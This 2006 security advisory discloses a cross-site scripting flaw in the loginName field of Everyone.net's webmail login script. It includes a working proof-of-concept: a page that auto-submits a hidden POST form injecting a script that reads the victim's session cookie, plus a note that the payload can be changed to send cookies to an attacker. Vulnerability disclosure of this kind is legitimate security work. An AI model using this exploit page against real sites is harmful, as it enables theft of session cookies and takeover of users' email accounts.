EveryoneXSS.txt

`Title: Everyone's loginName variable Cross Site Scripting  
  
Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>  
Published: 12 february 2006  
MorX Security Research Team  
http://www.morx.org  
Service: Webmail  
Vendor: everyone / www.everyone.net  
Vulnerability: Cross Site Scripting  
Exploit included: Yes  
  
Details:  
  
Everyone.net is an email service provider, offering new email accounts for  
personal email, group email, business email and outsourced email.  
eveyone.net offers secure email hosting with email accounts that are fast  
and reliable and provides full-featured email services for over 300,000  
domains. their solutions include a range of features including Web Mail,  
SpamShield Pro, Anti-Virus, IMAP, POP, SMTP and free domain registrations.  
for more information visit their website at http://www.everyone.net  
  
everyone's login perl script (loginuser.pl) is prone to cross-site  
scripting attacks. This problem is due to a failure in the script to  
properly sanitize user-supplied input when passed in variable loginName.  
  
from loginuser.htm source code after submiting ">maliciousCode as a username:  
  
<td align="right"><input type="text" name="loginName" size="15"  
value="">maliciousCode" maxlength="100"></td></tr>  
  
Impact:  
  
an attacker can exploit the vulnerable scripts to have arbitrary script  
code executed in the browser of an authentified everyone user in the  
context of the vulnerable website. resulting in the theft of cookie-based  
authentication giving the attacker full access to the victim's email  
account as well as other type of attacks.  
  
  
Affected script URL path:  
  
www.vulnerable-site.com/email/scripts/loginuser.pl  
  
Exploit:  
  
i ve read in a paper that cross site scripting that requires using the  
POST method instead of GET is not exploitable, that's false since POSTing  
a form doesnt necessary requires using <input type ="submit" instead of  
that we can use a javascript attribute to have the data automatically  
posted.  
  
everyone's exploit form:  
  
<html>  
  
<body onload="document.xploitform.submit(); ">  
  
<form name="xploitform" method="post"  
action="http://vulnerable-site/email/scripts/loginuser.pl">  
  
<input type="hidden" name="loginName"  
value='"><script>alert(document.cookie)</script>'>  
  
<input type="hidden" name="user_pwd" value='anypassword'>  
  
</form></body>  
  
</html>  
  
the above code can be placed on a web page by an attacker and have a  
victim visit the page. the login name value can be changed to have the  
cookie redirected and grabbed by the attacker  
  
Screen capture:  
  
http://www.morx.org/everyoneXSS.JPG  
  
Disclaimer:  
  
this entire document is for eductional, testing and demonstrating purpose  
only. Modification use and/or publishing this information is entirely on  
your OWN risk. The information provided in this advisory is to be  
used/tested on your OWN machine/Account. I cannot be held responsible for  
any of the above.  
`